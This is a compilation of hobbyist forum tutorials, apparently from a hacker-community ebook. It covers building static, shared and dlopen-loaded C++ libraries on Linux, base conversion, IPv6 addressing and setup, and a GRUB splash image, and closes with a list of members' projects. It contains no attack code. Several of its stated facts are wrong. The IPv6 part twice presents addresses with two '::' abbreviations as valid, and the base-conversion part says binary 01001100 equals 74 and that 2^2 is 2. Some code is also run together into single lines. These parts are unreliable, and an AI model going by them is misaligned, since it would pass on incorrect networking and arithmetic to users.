This might need a little explanation. -o as usual tells the name of the output file. -L. tells gcc to use . (the current directory) as library path. Otherwise gcc would search /lib and /usr/lib where libexample of course doesn't exist. -lexample links in the library example from the library path (as set by -L.). It must be named libexample.a or else an error will occur. lib indicates it's a library and .a indicated it's a static one. example is the name of the library.

When run this program should give the output:

Quote:

This is an example message from the example class.

Now when you've come this far it's time to show a little neat tool in Linux called readelf. It has many options but the one where interested in here is -s. If you run readelf -s libexample.a you get something similar to this:

Quote:

File: libexample.a(libexample.o)

Symbol table '.symtab' contains 28 entries:

Num: Value Size Type Bind Vis Ndx Name

0: 00000000 0 NOTYPE LOCAL DEFAULT UND

1: 00000000 0 FILE LOCAL DEFAULT ABS libexample.cpp

2: 00000000 0 SECTION LOCAL DEFAULT 2




6: 00000168 28 FUNC LOCAL DEFAULT 2 _GLOBAL__I__ZN7example7sh


8: 00000000 267 FUNC LOCAL DEFAULT 2 _ZSt17__verify_groupingPK


10: 00000128 63 FUNC LOCAL DEFAULT 2 _Z41__static_initializati

11: 00000000 1 OBJECT LOCAL DEFAULT 5 _ZSt8__ioinit

12: 00000184 20 FUNC LOCAL DEFAULT 2 __tcf_0





17: 00000000 39 FUNC WEAK DEFAULT 8 _ZSt3minIjERKT_S2_S2_

18: 00000000 0 NOTYPE GLOBAL DEFAULT UND __gxx_personality_v0

19: 00000000 0 NOTYPE GLOBAL DEFAULT UND _ZNKSs4sizeEv

20: 00000000 0 NOTYPE GLOBAL DEFAULT UND _ZNKSsixEj

21: 0000010c 28 FUNC GLOBAL DEFAULT 2 _ZN7example7showMsgEv

22: 00000000 0 NOTYPE GLOBAL DEFAULT UND _ZSt4cout

23: 00000000 0 NOTYPE GLOBAL DEFAULT UND _ZStlsISt11char_traitsIcE

24: 00000000 0 NOTYPE GLOBAL DEFAULT UND _ZNSt8ios_base4InitC1Ev

25: 00000000 0 NOTYPE GLOBAL DEFAULT UND __dso_handle

26: 00000000 0 NOTYPE GLOBAL DEFAULT UND __cxa_atexit

27: 00000000 0 NOTYPE GLOBAL DEFAULT UND _ZNSt8ios_base4InitD1Ev

Dig through it and check for one of the FUNC lines where the function in our class should be. In my case it's shown as _ZN7example7showMsgEv. This way you can see what's in a library or application as readelf can read any ELF format file. Check out the man page for more information on readelf. (man readelf)

One last thing here. If you want your library to be “installed” and be usable without the -L. and being able to include your header with #include <libexample.h> instead of using double quotes, put the header file in /usr/include and the library file (.a) in /usr/lib or /lib.

Shared librariesShared libraries differ from static ones by different extension (.so), by the way you create them, by memory efficiency and by having major and minor version numbers in the filename. Like with static libraries there's nothing complicated or special about the code. I'll just use the same code as above.

libexample.h:

Code:

#ifndef __LIBEXAMPLE_H__ #define __LIBEXAMPLE_H__ #include <iostream> using namespace std;

class example { public: void showMsg(); };

#endif

libexample.cpp:

Code:


void example::showMsg() { cout << "This is an example message from the example class."; }

example.cpp:

Code:


int main() { example msgobj; msgobj.showMsg(); return 0; }

Now, when you're about to create your library you need to decide what major and minor version this is. The first thing to do is compile your library's source file with a special option, -fPIC. I don't

know what that one does as it's hard to find information on it. But it's needed. To compile your library write like this:

Code:

g++ -fPIC -c -o libexample.o libexample.cpp

Now you've got an object file, compiled and assembled. To create your library from this file you write:

Code:

gcc -shared -Wl,-soname,libexample.so.1 -o libexample.so.1.0 libexample.o -lc

This may look a little scary but it's not that difficult if you look closer. -shared tells gcc to create a shared library. -Wl,-soname,libexample.so.1 defines the soname of your library. A soname is just the name of your shared object (.so file). -o libexample.so.1.0 is the actual filename, libexample.o is the input file (output of compilation) and -lc links in the standard c library necessary for the creation of shared libraries. Notice that in the -soname part you write only the major version number and in the -o part you write both major and minor version number. The version numbers are there to help you, your computer and others to distinguish between different versions that may be totally incompatible.

To install a shared library you will need to do a little more than with a static one. You have to place it in /lib or /usr/lib and make a couple of symbolic links. Easiest is to take advantage of a Linux tool called ldconfig. So copy your shared library to /usr/lib and use ldconfig:

Code:

cp libexample.so.1.0 /usr/libldconfig -nv /usr/lib

Then ldconfig will make the necessary symbolical links. The v in the options list is just for seeing some details about what's actually happening. You would think that ldconfig does everything for you, wrong! It leaves one thing to you. You and other lazy users will most likely not use the whole soname, you will omit the version numbers when compiling your code against the library. So we'll need to create one link ourselves. That's done with ln:

Code:

ln -svf /usr/lib/libexample.so.1 /usr/lib/libexample.so

The s in the option list specifies that this is a symbolic link, the v is for verbose so we see whats happening. And the f is for force to create the link even if something is there in our way. (Don't use that option if you have a feeling that something important could be in that place.) When we've came this far we're about to link our example application with the shared library. To do this we must first

compile our code into an object file:

Code:

g++ -c -o example.o example.cpp

By now, you should understand the above command but in case not, -c is for compile and assemble but not link, -o specifies the output file as example.o and the input is example.cpp. Okay, now we're linking example.o with the shared library. I assume you've installed it as I showed before. Now, link:

Code:

g++ -o example example.o -lexample

If you haven't installed the library you will need to add -L. between the input file and the library specifier. -lexample links your code with the library example from the library path. (Set by -L or else some default setting, usually /lib and /usr/lib) Then you just run example and it should output this:

Quote:

This is an example message from the example class.

Congratulations, if you've come here you have created your first shared library. Wasn't that hard or complicated, huh? Just one thing left in this section. Remember the tool I showed you in the end? I'm gonna show you a new tool now. It's called ldd and will show you what shared library's a program or shared library uses. You use it like this:

Quote:

Zelakesh# ldd libexample.so.1.0

linux-gate.so.1 => (0xb7fbd000)

libc.so.6 => /lib/tls/i686/cmov/libc.so.6 (0xb7e56000)

/lib/ld-linux.so.2 (0xb7fbe000)

Zelakesh# cd /bin

Zelakesh# ldd ls

linux-gate.so.1 => (0xb7f4e000)

librt.so.1 => /lib/tls/i686/cmov/librt.so.1 (0xb7f2f000)

libselinux.so.1 => /lib/libselinux.so.1 (0xb7f16000)

libacl.so.1 => /lib/libacl.so.1 (0xb7f0e000)

libc.so.6 => /lib/tls/i686/cmov/libc.so.6 (0xb7dbf000)

libpthread.so.0 => /lib/tls/i686/cmov/libpthread.so.0 (0xb7da7000)

/lib/ld-linux.so.2 (0xb7f4f000)

libdl.so.2 => /lib/tls/i686/cmov/libdl.so.2 (0xb7da3000)

libattr.so.1 => /lib/libattr.so.1 (0xb7d9f000)

Easy to use, and quite helpful if you want to know your dependencies.

Dynamic LibrariesThis kind of libraries are actually not a kind of library. Not it's own kind anyway. It's a shared one. And it isn't really the libraries that's dynamic. It's the way they're loaded. They are not linked into the code at compile-time, they're not loaded at program startup time. They are loaded when the programmer wants them to be loaded. This achieved by a special API. You have to include the file <dlfcn.h> and link your program with a library called libdl. This API consists of a couple of functions. They are; dlopen(), dlclose(), dlsym() and dlerror(). Unfortunately I haven't been able to find a way to use this technique with classes. I'll provide a link to an article about it at the bottom, but I didn't understand it so I won't try to do it here. I will show how to do this with functions instead. To do this I'll of course have to rewrite the library.

libexample.cpp:

Code:

#include "libexample.h" #include <iostream>

extern “C” void showMsg() { cout << "This is an example message from the example library."; }

libexample.h:

Code:

#ifndef __LIBEXAMPLE_H__ #define __LIBEXAMPLE_H__ using namespace std;

extern “C” void showMsg();

#endif

There's only one thing you may not have seen before. The extern “C” part, that's needed to load a function dynamically in C++. This has to do with how the functions are represented in the library when compiled. In C they keep their name and are referenced by it. However in C++ you can overload functions so there can be functions with the same name. When you declare a function as extern “C” you cannot overload it, but it can be dynamically loaded as it then keeps it's name in the compiled library. Other than that there's nothing strange here. You compile this as a shared library:

Code:

g++ -fPIC -c -o libexample.o libexample.cpp gcc -shared -Wl,-soname,libexample.so.1 -o libexample.so.1.0 libexample.o -lc

Notice that the commands doesn't differ from a standard shared library. If you don't understand these commands by now, you should re-read the section about shared libraries. Now, let's see how we modify the example program to use the library without linking with it.

Code:

#include <iostream> #include <cstdlib> #include <dlfcn.h> using namespace std;

int main() { void *libHandle; void (*funcHandle)(void); char *error; libHandle = dlopen("/root/programming/libexample/libexample.so.1.0", RTLD_LAZY); if(!libHandle) { cerr << dlerror(); exit(EXIT_FAILURE); } *(void **) (&funcHandle) = dlsym(libHandle, "showMsg"); if((error = dlerror()) != NULL) { cerr << error; exit(EXIT_FAILURE); } (*funcHandle)(); dlclose(libHandle); return 0; }

This code may look a little strange. But hopefully not that strange after I've explained it. Notice we don't include libexample.h as we don't need it when we dynamically load the library. Then we have included dlfcn.h to be able to use the dynamic loading API. The variables we're using is pointers. funcHandle is a special type of pointer, it's a function pointer. The void before is the return type of the function we want to point to, and the void in the parenthesis is the argument list, in this case only a void. The error variable is used to store error messages from dlerror(). Next we open our library with dlopen(). dlopen() returns the memory address where the library has been loaded, or in case of an error it returns NULL. The first argument is just the path to your shared library. The RTLD_LAZY argument is a flag specifying how the library shall be loaded. For now satisfy yourself with that you write RTLD_LAZY as the second argument to dlopen(). I'll go trough the flags later. After we've hopefully loaded the library we put an error check to see if we succeeded. If it was an error we output the message to stderr, tells our OS that we failed and exits. If it wasn't we continue to getting the actual function.

The next row, when we call dlsym() may look kinda cryptic. In a nutshell we search the library for our function and point to it with our pointer. The *(void **) part is a cast because dlsym returns a different kind of void than we want. (&funcHandle) retrieves the address of our pointer. The arguments to dlsym() is quite self explaining, first you have the handle for the library, then the symbol name for the function. With me so far? Good, now we obviously have to check if dlerror() returns NULL. If that's the case, we're all good, but if it doesn't we have an error. We have to save the error in a variable because otherwise we'll lose it as dlerror() only gives you the error message once. If we didn't have any error we're ready to execute the function. So next line runs the function from it's function pointer. And after these things are done we have to close the library. Or we don't have to, but it's nice behavior. Now we're ready to compile this nice little program:

Code:

g++ example.cpp -o example -ldl

example.cpp is the input file, example the output file and -ldl links with the libdl library. This special library is necessary as it allows us to perform this dynamic loading of other libraries. Now that you've hopefully learned how to use libraries dynamically I'll give a short section about the flags to dlopen.

dlopen() flagsThere's two kinds of flags to use as the second argument to dlopen(). Required and optional. There's two flags in the first group, you're required to have one of these. Those are:

Quote:

RTLD_LAZY - Perform lazy binding. Only resolve symbols as the code that references them is executed. If the symbol is never referenced, then it is never resolved. (Lazy binding is only performed for function references; references to variables are always immediately bound when the library is loaded.)

RTLD_NOW - If this value is specified, or the environment variable LD_BIND_NOW is set to a nonempty string, all undefined symbols in the library are resolved before dlopen() returns. If this cannot be done, an error is returned.

The second kind is totally optional, you can set them, but you don't have to. To use more than one flag (You obviously have to do this if you're using the optional flags) you or them with a pipe. Example:

Code:

libHandle = dlopen(“/lib/libh4xx.a”, RTLD_LAZY | RTLD_NODELETE);

The optional flags you can use are these:

Quote:

RTLD_GLOBAL - The symbols defined by this library will be made available for symbol resolution of subsequently loaded libraries.

RTLD_LOCAL - This is the converse of RTLD_GLOBAL, and the default if neither flag is specified. Symbols defined in this library are not made available to resolve references in subsequently loaded libraries.

RTLD_NODELETE (since glibc 2.2) - Do not unload the library during dlclose(). Consequently, the library’s static variables are not reinitialized if the library is reloaded with dlopen() at a later time. This flag is not specified in POSIX.1-2001.

RTLD_NOLOAD (since glibc 2.2) - Don’t load the library. This can be used to test if the library is already resident (dlopen() returns NULL if it is not, or the library’s handle if it is resident). This flag can also be used to promote the flags on a library that is already loaded. For example, a library that was previously loaded with RTLD_LOCAL can be re-opened with RTLD_NOLOAD | RTLD_GLOBAL. This flag is not specified in POSIX.1-2001.

RTLD_DEEPBIND (since glibc 2.3.4) - Place the lookup scope of the symbols in this library ahead of the global scope. This means that a self-contained library will use its own symbols in preference to global symbols with the same name contained in libraries that have already been loaded. This flag is not specified in POSIX.1-2001.

Note that the list of flags and their descriptions is not my work. Those are nicked from the dlopen() man page on my laptop. (Linux Mint Elyssa)

SummaryI hope someone will have use for this tutorial as it took me some time to write. Please spread it all over the net, just give me credit for writing it. If something is wrong, please tell me and I'll correct it. I wouldn't be too surprised as this is a quite big tutorial and only me and one other person have read through it.

General/MiscellaneousBase Conversion TutorialAuthor: GnomeI was surprised to find that no one has written a base conversion tutorial yet. Maybe its because its too easy, or maybe no one cares. Either way, I will write one now for those just getting started in computers. Once again, if you find any errors, please let me know. I'm writing all of these tuts at 3:00am so my mind might be wandering, its hard to say. Lets get started!

I'm going to be covering how to convert numbers to and from decimal, binary, hexadecimal and BCD. The last one you may not have heard of, but I will explain later.

So base 10, you maybe already know what this is, if you don't then surprise! YOU ALREADY KNOW IT! This is the system we count in. Numbers 0-9, you start at 0, go to 9, once you reach that you add another column. 10-19. I shouldn't have to explain that any farther, you know how to count. Anyways, this is what we refer to as the decimal system or base 10. The second system I'm going to talk about is binary or base 2. This is the computers language, it is what you will be dealing with the rest of your life if you're a computer tech. Now you may be wondering how to count in base 2, right? Well its just like decimal only with less numbers, you have 0 and 1, thats it! So just like before you'll start with 0 count to 1 and add another column and start over. I will show you the binary equivalent to counting to 16 in decimal.

Decimal - Binary

0 - 0 9 - 1001

1 - 1 10 - 1010

2 - 10 11 - 1011

3 - 11 12 - 1100

4 - 100 13 - 1101

5 - 101 14 - 1110

6 - 110 15 - 1111

7 - 111 16 - 10000

8 - 1000

Did you notice a pattern? If not, then I will show it to you. We'll start with decimal once again to make this easier to understand. Now say we have a number, 534 in decimal. For us it makes sense, we don't even break it down. But for this tutorial we will. 534 is the same as saying you have:

5 x 100s, 3 x 10s, 4 x 1s, right? 500 + 30 + 4 = 534

Another way to look at that is:

5 x 10^2 + 3 x 10^1 + 4 x 10^0 = 534

Some of you may say thats not true, 10^0 is 0 right? WRONG! 10^0 is 1. Anything raised to the power of 0 is 1, don't ask me why talk to your math teacher. So if finding 534 was that easy, can't we break other base systems down like that too? In fact we can. Lets break down the binary number 1010:

1 x 2^3 + 0 x 2^2 + 1 x 2^1 + 0 x 2^0 => 1010

Now if you actually do the calculations, you get the decimal conversion! Yes its that easy. By breaking the binary number down, you can get the decimal equivalent of it, which would be 10. Check it with our counting above.

What about going the other way? Well there are many ways to do that. You can do a multiplication guess and check, or a synthetic division. Its easy if you know the quick conversions, lets take a look:

2^7 - 2^6 - 2^5 - 2^4 - 2^3 - 2^2 - 2^1 - 2^0

128 - 64 - 32 - 16 - 8 - 4 - 2 - 1

Now do you see the pattern? Flip it around, can you see it now? You start at the right hand side, and every time you add a column to the left side you double the number. So substitute some numbers in there. Say you had 01001100. You have a 1 where there is 2^6 which we've written as 64, there is a 1 also at 2^3=8 and 2^2=2. Add those up what do you get? 74! That is the decimal equivalent of our binary number.

If you're given a decimal number and you want to convert to binary, the easiest way in my opinion is the multiplication guess and check method. Say you have 534 in decimal. The closest power of 2 we can get without going over the number is 2^9 which = 512. Subtract that from what you've already got. 534-512=22. What is the next highest power that doesn't go over 22? 2^4=16, subtract that from the new total. 22-16=6. Continue on down the line, now its 2^2=4. 6-4=2. 2^1=2. 2-2=0. Once you've reached 0 you're done. Don't forget to substitute a 0 for the in between values that don't work. So we had a 1 at 2^9, 2^4, 2^2 and 2^1 but not 2^8, 2^7, 2^6, 2^5, 2^3 or 2^0. Our number would then be:

1 x 2^9 + 0 x 2^8 + 0 x 2^7 + 0 x 2^6 + 0 x 2^5 + 1 x 2^4 + 0 x 2^3 + 1 x 2^2 + 1 x 2^1 + 0 x 2^0

String it together to get: 1000010110

I know that was probably a bit confusing, but read it over a few times and you should get the hang of it. There is also another way to do this using a type of synthetic division, which works just as well. But I will save that for another tutorial. Now lets convert binary to hexadecimal, which is base 16. You might be wondering how thats possible, there are only 0-9 numbers! You're right, so once we hit 9 we go to A-F. So you would count 1, 2, 3..., 8, 9, A, B, C..., F You get the point.

There is a very easy way to convert binary to hexadecimal and vice versa because of how the numbers work. Lets start by showing the binary/decimal equivalents of hexadecimals numbers.

hex - decimal - binary

0 - 0 - 0

1 - 1 - 1

2 - 2 - 10

3 - 3 - 11

4 - 4 - 100

5 - 5 - 101

6 - 6 - 110

7 - 7 - 111

8 - 8 - 1000

9 - 9 - 1001

A - 10 - 1010

B - 11 - 1011

C - 12 - 1100

D - 13 - 1101

E - 14 - 1110

F - 15 - 1111

So the equivalent of a hexadecimal F is 1111 in binary. Which means once you go to 10 in hexadecimal you move up to 10000 in binary or 00010000 if you extend it to a full byte. There is a pattern to this, do you see it? Maybe with another number.

Hexadecimal = 58

Binary = 01011000

CAN YOU SEE IT?! Break up the binary number into nibbles, sets of 4 bits. You get 0101 and 1000. What are the decimal equivalents to each? 0101=5 and 1000=8. Put them together you get 58.

Its one of the easiest conversions in my opinion. This goes both ways, if you want to convert a number from binary to hexadecimal. Break it up into nibbles and convert each nibble.

1100010000101001 = ?

1100 = C; 0100 = 4; 0010 = 2; 1001 = 9;

The hexadecimal equivalent is: C429

If you want to convert to decimal just use the way described above going from binary to decimal, or you can do it straight from hexadecimal to decimal. The base is 16 and thats all you need to know.

Finally I will quickly describe BCD, which is Binary Coded Decimal. Its basically a way to encoding decimal into a binary format thats different than what we talked about above. Say you want to convert 146 base 10 to BCD. It would then be 0001 0100 0110 = 000101000110. Its the same way we converted from hexadecimal, but with BCD you cannot leave out any leading 0's because it takes the entire nibble to represent a BCD number. Its not commonly used, but I thought you might want to know about it.

Thats it for this tutorial, I know I probably jumped around a lot and might have skipped some things. Its almost 5am now, so my mind is even more gone! But I hope you enjoyed and if you have questions, just ask

A Brief Introduction to Ipv6Author: Blue DevilSince the IPv4 addresses are running out and the fact that IPv6 is soon to replace it, I thought I should write a short introduction for IPv6 for those not familiar with it.

Address StructureIPv4 is, as you all may know, built up of four groups ranging from 0-255 separated by a dot. Like 127.0.0.1 for localhost.

IPv6 on the other hand is build up of eight groups of four hexadecimal characters separated by a colon.

The IPv6 version of localhost is 0000:0000:0000:0000:0000:0000:0000:0001. There are ways to simplify this, I will go back to it later.

If some of you aren't familiar with hexadecimal digits, it's 16 characters, 0-9 and A-F.

These are two examples of valid IPv6 addresses:

Code:

A32F:5213:C032:FFF3:EEAD:31AE:3123:1896325B:3368:0000:3F3A:99EA:9823:ADE4:1312

Simplifying of ZerosIt wouldn't be that fun to write 0000:0000:0000:0000:0000:0000:0000:0001 just to get to localhost, there's a smart method to skip the zeros. You simply write ::1 instead.

The method works by replacing a series of zeros with just two colons.

I gave two examples of valid addresses before. One of them had a group with only zeros. That address could be replaced by the following:

Code:

325B:3368::3F3A:99EA:9823:ADE4:1312

So, to summarize it, as long as there are just zeros in series, they can all be replaced by two colons.

So the address

Code:

3DEA:33C4:0000:1F8A:43EE:0000:CEA1:0012

Could be replaced by

Code:

3DEA:33C4::1F8A:43EE::CEA1:0012

If a group starts with one or more zeros, these can be removed. This means that

Code:

3DEA:33C4:0000:1F8A:43EE:0000:CEA1:0012

could also be replaced by

Code:

3DEA:33C4::1F8A:43EE::CEA1:12

This is only the zeros the character group starts with.

One thing that should be noted is that you can't replace the zeros with colons in all situations.

To show an example,

Code:

33BA:0000:0000:2167:99CC:0000:CAD4:32AF

can't be replaced by

Code:

33BA::2167:99CC::CAD4:32AF

since it would be unclear and impossible for the computers to determinate which side that had two groups of zeros.

The address could however be replaced with

Code:

33BA:0000::2167:99CC::CAD4:32AF

Using the AddressesTo use the address in a browser you put it in square brackets. So, to visit ::1 you would write

Code:

http://[::1]/

in your address bar. This is to avoid collisions with port specification such as:

Code:

http://[::1]:8080/

Firefox already supports IPv6. Try it out if you got a local web server running by using the address above.

CommentsThis is just a simple introduction with some of the things I have learned while researching.

I made it mainly because Wikipedia's explanation, excuse me, literally sucks for beginners. Maybe even those who aren't new with networking wouldn't understand it.

I also want to apologize if something is unclear. If I have explained something badly, just drop a post and I'll fix it.

A Brief Introduction to IPv6 – Part 2Author: Blue DevilThought I should continue explaining things and how to set up your network at home for IPv6.

Perhaps I shouldn't really call it “brief” anymore?

Setting up IPv6 in WindowsAlways plan ahead, a simple rule. If you want to activate IPv6 for your Windows, follow the instructions below.

1. Go into classic mode of the Control Panel.

2. Go to Network Connections.

3. Right click and select Properties on the network you want to activate IPv6 on.

4. Click install in the General tab, the one that you should end up in from the start.

5. Select Protocol in the list showing.

6. There should be something like Microsoft TCP/IP Version 6 in the list. Select it and press Okay.

7. It should now load for a little, let it finish and then just close the window.

There, you are ready to go. Check cmd by using ipconfig /all to make sure it works. You should see an entry with a IPv6 address.

Also check with ping -6 ::1 to be sure the connection works.

Note: Vista should have this pre-installed.

Setting up IPv6 for LinuxIf you got Linux you should start with using ifconfig to check if there is any inet6 entry. If there isn't, follow the instructions below.

My settings go removed after restart, but I am no pro with Linux. If someone have any idea of making it permanent, please post it or PM me.

1. Open up a terminal and become root/superuser. Or you could use sudo, your choice.

2. Simply write modprobe ipv6 in your terminal.

3. Check with ifconfig to make sure you've got an inet6 entry with your IPv6 address.

4. Check if the connection works by typing ping6 ::1

5. If you get an error like Invalid argument, then use ping6 -I <interface> ::1

For example ping6 -I eth0 ::1

SSH & Interfaces(Linux)For you who got a local network with SSH and want to look “pro”, I figured I should describe how to connect to SSH with IPv6.

Start with figuring out the IPv6 of the machine you want to connect to. Preferable with ifconfig.

Use the following string:

ssh -6 <address>%<interface>

You will only need the interface if you get the Invalid argument error.

So, how would you get the interface? Either just write your interface name, like eth0 or the index of the interface. If you don't know know it, use ifconfig to find out.

Examples:

Code:

ssh -6 fe80::21f:3cff:fe6d:f5bb%4ssh -6 fe80::21f:3cff:fe6d:f5bb%wlan0

If you can't connect to the SSH server, either the client or the server hasn't had its IPv6 configured right, or IPv6 has been disabled for SSH. It isn't originally, so if it is, it's you who have done it, so you should know how to change it back.

If you can connect to SSH with localhost, that will say

Code:

ssh -6 ::1

then you need to control that the client got IPv6. It could be your router or network devices as well, but it is unlikely.

CommentsThe addresses you get should be local addresses. I have yet not figured out to check your external one. Perhaps a ping would do?

I am going to figure out how to set up IPv6 for apache2 soon, you'll hopefully see it soon.

Any corrections, suggestions or comments are accepted, I'll correct myself if anything is wrong.

A note to those with Windows. The interface could be needed to be specified in some cases, just use nearly the exact method as Linux

Changing the Grub Splash ScreenAuthor: 19bab79After i started using Linux i had been searching for a way to make my grub menu look good. i had found descriptions on how to install a new splash image, but had never gotten it to work. today i figured out the fix and will describe how to change your grub splash image.

first you must pick an image. here is where there are a few available:

http://www.gnome-look.org/content/search.php

these images will be in xpm.gz or tar.gz format. i have only used the xpm.gz so far.

After downloading the image place it into the folder you wish (if you did not download directly to it). i stuck mine in my boot folder. to place the image in the boot or grub folder you will probably need to be root. (do not unpack the image, leave it in the xpm.gz or tar.gz format.)

To move the file into the folder as root, open a console and log in as root. after root type 'nautilus' into your console (sudo nautilus if using ubuntu). the nautilus file manager will pop up with root privileges and you can move any file as necessary.

After placing the image in the proper folder, edit your /boot/grub/menu.lst file. add the following line into the file: splashimage=/boot/56951-boot.xpm.gz (this is the path to MY image. enter the proper path to your image)

The descriptions before had said the path should be proceeded by the partition number to grub. this never worked for me. if my way does not work add the partition number and see if that works. here is an example:

splashimage=(hd0,0)/boot/56951-boot.xpm.gz

here is the very top of my file for an example:

Code:

# menu.lst - See: grub(8), info grub, update-grub(8)# grub-install(8), grub-floppy(8),# grub-md5-crypt, /usr/share/doc/grub# and /usr/share/doc/grub-doc/.splashimage=/boot/56951-boot.xpm.gz## default num# Set the default entry to the entry number NUM. Numbering starts from 0, and# the entry number 0 is the default if the command is not used.

After entering the path to the image you can save the file and reboot. your image should be in place.

US Members ProjectsThe following are projects developed by US members. Weve not included the source code on some of them but we have included links to the relevant pages where more information can be found. Unfortunatley some of the information is vague as I (Linx) am unsure of the status of most of them. See below for some of the many projects ongoing.

USL (Underground Systems Linux)Underground Systems Linux distribution. Current status is unknown but its been in the making a while. Speak to t0nedef or any of the other members with 'USL Dev' in their title on the forums.

Closecrypt Encryption Systemd4de is currently working on CloseCrypt Encryption System v2.0, however, it's currently under heavy modification. The current working version is v1.1

Name: Amr Ali (d4de)Stable Version: 1.1Sid Version: 2.0

Links for the source code of version 1.0.1 ......

main.c http://d4de.pastebin.com/f32bd0448closecrypt.h http://d4de.pastebin.com/f64bb95d7closecrypt-framework.h http://d4de.pastebin.com/f6496686dUS Post: http://www.undergroundsystems.org/forums/showthread.php?p=57311

US New Post Perl ScriptYestoi had developed the concept of a new post notification script. We have included the source code from the original below but please be aware that many modifications have been made to this script and can be seen here (http://www.undergroundsystems.org/forums/showthread.php?t=2968). Most of the modifications have been done by BlackJack.

Code:

#!/usr/bin/perl# This is a script to look up new posts on the UndergroundSystems forum. You may port it to any other# site, but you might want to change the regular expresions. Coded by Yestoi.use LWP 5.64;my $browser = LWP::UserAgent->new;my $url = 'http://www.undergroundsystems.org';@args = ("echo", "-ne", "\007"); #Makes bell chime | comment out with a # for windowsmy $checkvalue = $browser->get( $url );$checkvalue->content=~/<span class="time">(.+)<\/span><br \/>by <a href=\".+\" rel/;my $time = $1;#print "Current time of last post: $time\n"; #debug

http://www.undergroundsystems.org/forums/showthread.php?t=2968

http://www.undergroundsystems.org/forums/showthread.php?p=57311

http://d4de.pastebin.com/f6496686d

http://d4de.pastebin.com/f6496686d

http://d4de.pastebin.com/f64bb95d7

http://d4de.pastebin.com/f32bd0448

while(1){

my $response = $browser->get( $url );die "Error", $response->status_line

unless $response->is_success;$response->content=~/<span class="time">(.+)<\/span><br \/>by <a href=\".+\" rel/;

if ( $time ne $1 ){

$time = $1;$response->content=~/<td class="alt1">\s+?<a href=\".+\"\s+?title=\".+\"><.

+?>(.+)<\/.+?><\/a>/;system(@args); #comment this out also for windows supportprint "[$_]New Topic: $1\n"; # for windows support, add an '\a' inside the

string}

sleep 30; # Waits for 30 seconds then checks US again.}

Rapid Hacker Programmed in VB by xyr0x, this masterpiece does exactly what it says on the tin... Im not going to bother trying to explain it just go to the link and give it a whirl.. there is constantly new releases. The current version is 'Rapid Hacker v4.2 Anniversary Edition'.

URL: http://www.undergroundsystems.org/forums/showthread.php?t=5428

Proxy Ripper v1.0Programmed in VB6 by Linx, designed to rip a few proxies off of a site. This started as a string manipulation project. There is no intention of taking this any further.


USSROur very own resident DJ Black.Solaris hosts this in his spare time. Various people are welcomed and encouraged to DJ on this station. We hear nothing but good things from this project.





lockdown_-_hackers_ebook

Documents